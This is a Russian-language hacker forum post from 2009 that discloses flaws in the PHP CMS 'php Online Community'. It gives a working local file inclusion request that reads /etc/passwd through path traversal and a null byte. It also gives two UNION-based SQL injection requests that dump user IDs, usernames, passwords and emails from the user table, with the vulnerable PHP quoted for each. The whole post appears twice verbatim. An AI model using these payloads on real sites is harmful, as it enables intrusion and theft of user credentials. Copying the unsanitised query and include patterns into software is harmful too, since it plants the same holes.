BlackSun
26.03.2009, 12:05
php Online Community
Версия: хез, офф сайт не нашел (
Офф сайт: хез, офф сайт не нашел (
Скачать: http://allskripts.ru/other_scripts/cms/256-php-online-community.html
LFI
Уязвимый скрипт: index.php
Запрос: http://localhost/phponline/?d=../../../../../../../../../../../../../../../etc/passwd%00
Уязвимый кусок кода:
// core.class.php
$d=$_GET[d]; if($d=="") $d=$_POST[d];
// index.php
if(file_exists($d.".inc.php")==1) include($d.".inc.php");
else include("home.inc.php");
SQL-INJ
Уязвимый скрипт: alben.inc.php
Зависимость: magic_quotes = off
Запрос: index.php?d=alben&a=-1'+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a,0x3e,id,user,pass,email,0x3c212d2d),12,13,14,15, 16,17,18,19,20,21,22,23,24+FROM+oc_user+LIMIT+0,1--+
Уязвимый кусок кода:
<?php
$a=$_GET[a];
$seite=$_GET[seite];
if(!$seite || $seite==0) $sza=0;
else $sza = $seite * 10 - 1;
$acc=0;
$getaaa=mysql_query("SELECT * FROM oc_fotos_alben WHERE user='".$a."'");
$getff=mysql_query("SELECT * FROM oc_fotos_alben WHERE user='".$a."' ORDER BY datum DESC LIMIT $sza,10");
$getvv=mysql_query("SELECT * FROM oc_user WHERE id='".$a."'"); $getv=mysql_fetch_array($getvv);
echo "<b>Fotoalben von: <img src=images/user_".$getv[geschlecht].".png width=16 height=16 align=absmiddle><a href=\"".genURL($modrw,'profil/'.urlencode($getv[user]).'/','index.php?d=profil&s='.urlencode($getv[user]))."\">".ucfirst($getv[user])."</a></b>";
SQL-INJ
Уязвимый скрипт: blog.inc.php
Зависимость: magic_quotes = off
Запрос: index.php?d=blog&e=-1'+union+select+1,2,3,concat_ws(0x3a,0x3e,id,user, pass,email,0x3c212d2d),5+from+oc_user+--+
Уязвимый кусок кода:
В целом - целиком весь файл ..
$gettt=mysql_query("SELECT * FROM oc_blogs_kommentare WHERE beitrag='".$e."' ORDER BY datum LIMIT $sza,10");
$aaanz=mysql_num_rows($getaaa);
$ap1=$sza+1;
$dsanz=$ap1+9;
if($aaanz<$dsanz) $dsanz=$aaanz;
$ans=ceil($aaanz/10);
$aks=$seite+1;
$next=$seite+1;
$prev=$seite-1;
echo "<img src=images/table_edit.png width=16 height=16 align=absmiddle> <a href=".genURL($modrw,'login/blogkommentar/'.$e.'/','index.php?d=login&s=blogkommentar&u='.$e).">Kommentar schreiben</a><br><br>";
if(mysql_num_rows($getaaa)!=0) {
echo "<table border=0 cellspacing=0 cellpadding=5 align=center>";
while($getg=mysql_fetch_array($gettt)) {
Глянул пару файлов и хватит. Очень дырявый движок, без уязвимостей только картинки ..
Версия: хез, офф сайт не нашел (
Офф сайт: хез, офф сайт не нашел (
Скачать: http://allskripts.ru/other_scripts/cms/256-php-online-community.html
LFI
Уязвимый скрипт: index.php
Запрос: http://localhost/phponline/?d=../../../../../../../../../../../../../../../etc/passwd%00
Уязвимый кусок кода:
// core.class.php
$d=$_GET[d]; if($d=="") $d=$_POST[d];
// index.php
if(file_exists($d.".inc.php")==1) include($d.".inc.php");
else include("home.inc.php");
SQL-INJ
Уязвимый скрипт: alben.inc.php
Зависимость: magic_quotes = off
Запрос: index.php?d=alben&a=-1'+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a,0x3e,id,user,pass,email,0x3c212d2d),12,13,14,15, 16,17,18,19,20,21,22,23,24+FROM+oc_user+LIMIT+0,1--+
Уязвимый кусок кода:
<?php
$a=$_GET[a];
$seite=$_GET[seite];
if(!$seite || $seite==0) $sza=0;
else $sza = $seite * 10 - 1;
$acc=0;
$getaaa=mysql_query("SELECT * FROM oc_fotos_alben WHERE user='".$a."'");
$getff=mysql_query("SELECT * FROM oc_fotos_alben WHERE user='".$a."' ORDER BY datum DESC LIMIT $sza,10");
$getvv=mysql_query("SELECT * FROM oc_user WHERE id='".$a."'"); $getv=mysql_fetch_array($getvv);
echo "<b>Fotoalben von: <img src=images/user_".$getv[geschlecht].".png width=16 height=16 align=absmiddle><a href=\"".genURL($modrw,'profil/'.urlencode($getv[user]).'/','index.php?d=profil&s='.urlencode($getv[user]))."\">".ucfirst($getv[user])."</a></b>";
SQL-INJ
Уязвимый скрипт: blog.inc.php
Зависимость: magic_quotes = off
Запрос: index.php?d=blog&e=-1'+union+select+1,2,3,concat_ws(0x3a,0x3e,id,user, pass,email,0x3c212d2d),5+from+oc_user+--+
Уязвимый кусок кода:
В целом - целиком весь файл ..
$gettt=mysql_query("SELECT * FROM oc_blogs_kommentare WHERE beitrag='".$e."' ORDER BY datum LIMIT $sza,10");
$aaanz=mysql_num_rows($getaaa);
$ap1=$sza+1;
$dsanz=$ap1+9;
if($aaanz<$dsanz) $dsanz=$aaanz;
$ans=ceil($aaanz/10);
$aks=$seite+1;
$next=$seite+1;
$prev=$seite-1;
echo "<img src=images/table_edit.png width=16 height=16 align=absmiddle> <a href=".genURL($modrw,'login/blogkommentar/'.$e.'/','index.php?d=login&s=blogkommentar&u='.$e).">Kommentar schreiben</a><br><br>";
if(mysql_num_rows($getaaa)!=0) {
echo "<table border=0 cellspacing=0 cellpadding=5 align=center>";
while($getg=mysql_fetch_array($gettt)) {
Глянул пару файлов и хватит. Очень дырявый движок, без уязвимостей только картинки ..